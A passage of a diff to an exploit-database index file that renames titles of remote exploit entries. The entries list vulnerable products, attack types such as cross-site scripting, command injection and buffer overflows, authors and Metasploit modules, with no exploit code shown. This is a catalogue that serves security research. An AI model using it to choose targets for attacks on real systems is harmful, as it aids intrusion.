web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 -33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX 'CLIproxy.dll' Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 +33642,platforms/windows/remote/33642.html,"Symantec (Multiple Products) - Client Proxy ActiveX 'CLIproxy.dll' Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 -33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Parameter Cross-Site Scripting",2010-02-18,"George Christopoulos",multiple,remote,0 +33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",multiple,remote,0 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i - lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 33663,platforms/multiple/remote/33663.txt,"IBM Websphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 @@ -14863,7 +14864,7 @@ id,file,description,date,author,platform,type,port 33865,platforms/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,linux,remote,40007 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0 -33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Parameter URI redirection",2010-04-25,"Aung Khant",multiple,remote,0 +33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' URI Redirection",2010-04-25,"Aung Khant",multiple,remote,0 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,multiple,remote,0 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0 @@ -14880,7 +14881,7 @@ id,file,description,date,author,platform,type,port 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,windows,remote,9002 33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0 -33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 +33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' ActiveX Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 33944,platforms/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)",2014-07-01,sickness,windows,remote,0 @@ -14904,10 +14905,10 @@ id,file,description,date,author,platform,type,port 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 -34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 +34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34156,platforms/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 -34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Parameter Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 +34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center - 'sysinfo/sysinfomain.htm' Cross-Site Scripting",2010-06-10,"Tavis Ormandy",windows,remote,0 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0 @@ -14954,7 +14955,7 @@ id,file,description,date,author,platform,type,port 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466 34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0 -34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0 +34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Executions",2010-08-25,storm,windows,remote,0 34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Code Execution",2014-09-09,eF,linux,remote,80 34621,platforms/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0 @@ -15024,10 +15025,10 @@ id,file,description,date,author,platform,type,port 34999,platforms/linux/remote/34999.txt,"Eclipse 3.6.1 - Help Server help/advanced/content.jsp URI Cross-Site Scripting",2010-11-16,"Aung Khant",linux,remote,0 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VideoLAN VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,windows,remote,0 -35003,platforms/multiple/remote/35003.txt,"IBM OmniFind - 'command' Parameter Cross-Site Scripting",2010-11-09,"Fatih Kilic",multiple,remote,0 +35003,platforms/multiple/remote/35003.txt,"IBM OmniFind - 'command' Cross-Site Scripting",2010-11-09,"Fatih Kilic",multiple,remote,0 35005,platforms/windows/remote/35005.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 -35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 +35007,platforms/windows/remote/35007.c,"Native Instruments (Multiple Products) - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0 35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 @@ -15037,10 +15038,10 @@ id,file,description,date,author,platform,type,port 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 35055,platforms/windows/remote/35055.py,"Microsoft Windows - OLE Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow",2010-12-07,"Luigi Auriemma",multiple,remote,0 -35068,platforms/hardware/remote/35068.txt,"pfSense - pkg_edit.php id Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 -35069,platforms/hardware/remote/35069.txt,"pfSense - pkg.php xml Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 -35070,platforms/hardware/remote/35070.txt,"pfSense - status_graph.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 -35071,platforms/hardware/remote/35071.txt,"pfSense - interfaces.php if Parameter Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 +35068,platforms/hardware/remote/35068.txt,"pfSense - 'pkg_edit.php?id' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 +35069,platforms/hardware/remote/35069.txt,"pfSense - 'pkg.php?xml' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 +35070,platforms/hardware/remote/35070.txt,"pfSense - 'status_graph.php?if' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 +35071,platforms/hardware/remote/35071.txt,"pfSense - 'interfaces.php?if' Cross-Site Scripting",2010-11-08,"dave b",hardware,remote,0 35078,platforms/unix/remote/35078.rb,"Centreon - SQL Injection / Command Injection (Metasploit)",2014-10-27,Metasploit,unix,remote,80 35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0 35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0 @@ -15054,7 +15055,7 @@ id,file,description,date,author,platform,type,port 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM (Metasploit)",2014-11-03,Metasploit,hardware,remote,9100 35166,platforms/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 - 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution",2011-01-03,d3c0der,windows,remote,0 35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0 -35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0 +35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Executions",2011-01-05,d3c0der,windows,remote,0 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin N750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 @@ -15117,13 +15118,13 @@ id,file,description,date,author,platform,type,port 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 -35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 +35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",android,remote,0 -35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf jdeowpBackButtonProtect' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService RENDER_MAFLET' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf?jdeowpBackButtonProtect' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService?RENDER_MAFLET' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService?jdemafjasLinkTarget' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,php,remote,80 @@ -15140,9 +15141,9 @@ id,file,description,date,author,platform,type,port 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - iptm/advancedfind.do extn Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 - iptm/ddv.do deviceInstanceName Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 -35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 -35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 -35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - iptm/logicalTopo.do Multiple Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 +35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 +35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 +35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)",2015-01-13,Metasploit,windows,remote,0 35778,platforms/php/remote/35778.rb,"WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,php,remote,80 @@ -15160,12 +15161,12 @@ id,file,description,date,author,platform,type,port 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 35817,platforms/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 -35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 +35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 -35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,java,remote,8080 +35845,platforms/java/remote/35845.rb,"ManageEngine (Multiple Products) - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,java,remote,8080 35855,platforms/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",php,remote,0 35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0 35880,platforms/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 @@ -15178,7 +15179,7 @@ id,file,description,date,author,platform,type,port 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change",2015-01-27,"Todor Donev",hardware,remote,0 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 -35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 +35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 @@ -15213,15 +15214,15 @@ id,file,description,date,author,platform,type,port 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,linux,remote,443 -36217,platforms/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp group' Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 -36218,platforms/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp url' Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 -36219,platforms/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36217,platforms/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36218,platforms/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 +36219,platforms/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Cross-Site Scripting Vulnerabilities",2011-10-10,"Silent Dream",windows,remote,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 -36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices - Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 +36238,platforms/multiple/remote/36238.txt,"Toshiba e-Studio (Multiple Devices) - Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 -36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 +36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 -36256,platforms/hardware/remote/36256.txt,"Cisco - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 +36256,platforms/hardware/remote/36256.txt,"Cisco - 'file' Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0 36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 @@ -15275,8 +15276,8 @@ id,file,description,date,author,platform,type,port 36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0 -36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 -36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 +36680,platforms/hardware/remote/36680.txt,"Trendnet Camera (Multiple Products) - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 +36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)",2015-04-09,xort,linux,remote,8000 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0 @@ -15296,7 +15297,7 @@ id,file,description,date,author,platform,type,port 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0 37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869 -36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0 +36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities",2012-02-21,Busindre,hardware,remote,0 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0 36877,platforms/hardware/remote/36877.html,"D-Link DCS - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote,0 @@ -15305,7 +15306,7 @@ id,file,description,date,author,platform,type,port 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0/4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 -36945,platforms/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection",2012-03-12,l20ot,hardware,remote,0 +36945,platforms/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection",2012-03-12,l20ot,hardware,remote,0 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 